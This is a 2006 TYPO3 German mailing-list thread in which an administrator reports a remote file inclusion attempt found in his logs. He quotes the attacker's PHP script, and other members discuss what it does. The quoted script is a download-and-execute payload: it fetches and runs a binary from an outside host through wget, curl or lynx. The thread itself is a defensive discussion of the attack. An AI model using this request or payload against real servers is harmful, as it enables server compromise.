[TYPO3-german] Komische Anfrage an mein Typo3
ernst parth
eparth at epatec.at
Fri Sep 1 10:14:37 CEST 2006
das Skript versucht auf 3 Varianten ein Programm (kt2) nach /var/temp/
nachzuladen und dann dieses im Hintergrund zu starten.
lG
ernst
"Andreas Balzer" <eMail at andreas-balzer.de> schrieb im Newsbeitrag
news:mailman.1.1157057597.31336.typo3-german at lists.netfielders.de...
> Christian Leicht schrieb:
> > Hallo
> >
> > ich habe gerade meine Logfiles einer T3 installation durchgeschaut und
> > folgenes gefunden:
> >
> > index.php?id=34&L=http://abuser.republika.pl/test
> >
> > Versucht da jemand meine Seite zu knacken? Wenn ich dem Link nachgehe
> > kommt dieses php Script zum Vorschein:
> >
> > <?
> >
> > echo 'm4k4bra - mamy cie';
> >
> > system('cd /var/tmp;wget http://abuser.republika.pl/kt2; if [ ! -e ./kt2
> > ]; then curl http://abuser.republika.pl/kt2 > kt2;fi;if [ ! -e ./kt2
> > ];then lynx -dump http://abuser.republika.pl/kt2 >kt2; fi; chmod 777
> > kt2; ./kt2&');
> >
> > ?>
> >
> > Christian
> Hi! Ich weiß zwar nicht genau was das Script macht, aber es scheint
> darauf konzipiert zu sein, eine Menge Daten runterzuladen. An deiner
> Stelle würde ich es vorerst sperren.. Schaden kann das sperren ja nie..
> (reine Sicherheitsmaßnahme..)
>
> Grüße
> Andreas
More information about the TYPO3-german
mailing list